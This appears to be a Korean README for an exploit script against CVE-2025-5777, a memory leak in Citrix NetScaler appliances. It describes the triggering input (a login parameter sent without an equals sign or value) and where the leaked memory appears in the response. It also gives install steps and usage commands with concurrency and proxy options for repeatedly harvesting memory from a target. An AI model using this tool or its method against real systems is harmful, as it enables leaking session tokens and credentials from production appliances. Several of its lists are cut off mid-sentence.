
[!WARNING] 이 스크립트는 교육 및 연구 목적으로만 제공됩니다. 명시적 허가 없이 시스템을 대상으로 사용하지 마십시오. 무단 액세스 또는 테스트는 불법적이고 비윤리적입니다. 이 스크립트를 사용하기 전에 전체 DISCLAIMER를 읽어 보십시오.
이 프로젝트는 Citrix NetScaler 어플라이언스에서 발견된 메모리 누수 취약점(CVE-2025-5777)을 시연합니다. 이 취약점은 잘못된 형식의 POST 데이터(특히 login 매개변수)를 파싱할 때 초기화되지 않은 메모리를 부적절하게 처리하여 발생합니다. 2023년에 대규모로 악용된 악명 높은 CVE-2023-4966(원래 CitrixBleed)과 매우 유사하여 CitrixBleed 2로 널리 알려져 있습니다.
login 필드가 등호나 값 없이 포함되면 초기화되지 않은 스택 메모리 일부가 XML 응답의 <InitialValue> 태그 안에 반환됩니다.

유출되는 데이터: 각 HTTP 요청은 약 127바이트의 RAM 콘텐츠를 유출할 수 있습니다. 이러한 요청을 반복하면 공격자는 메모리에서 민감한 데이터를 수집할 수 있으며, 여기에는 다음이 포함될 수 있습니다:
pip3 install aiohttp colorama
python3 exploit.py <URL> [options]
positional arguments:
url Base URL (e.g., http://target.com)
optional arguments:
-h, --help Show help message
-v, --verbose Enable debug output
-p, --proxy PROXY HTTP proxy URL (e.g., http://127.0.0.1:8080)
-t, --threads N Number of concurrent threads (default: 10)
-d, --delay SECONDS Delay between request batches in seconds (default: 1.0)
--max-requests N Maximum number of requests to send (default: unlimited)
-e, --endpoints PATH Additional endpoints to test (can specify multiple)
--no-save Don't save data to files on exit
기본 사용법:
python3 exploit.py http://target.com
프록시를 사용한 자세한 출력 모드:
python3 exploit.py http://target.com -v -p http://127.0.0.1:8080
속도 제한을 적용한 높은 동시성:
python3 exploit.py http://target.com -t 20 -d 0.5
요청 수 제한 및 여러 엔드포인트 테스트:
python3 exploit.py http://target.com --max-requests 1000 -e /p/u/doAuthentication.do /api/auth
도움말:
python3 exploit.py -h
이 강화된 버전에는 다음이 포함됩니다:
이 고급 Python 스크립트는 다음을 수행합니다:
<InitialValue> 태그 파싱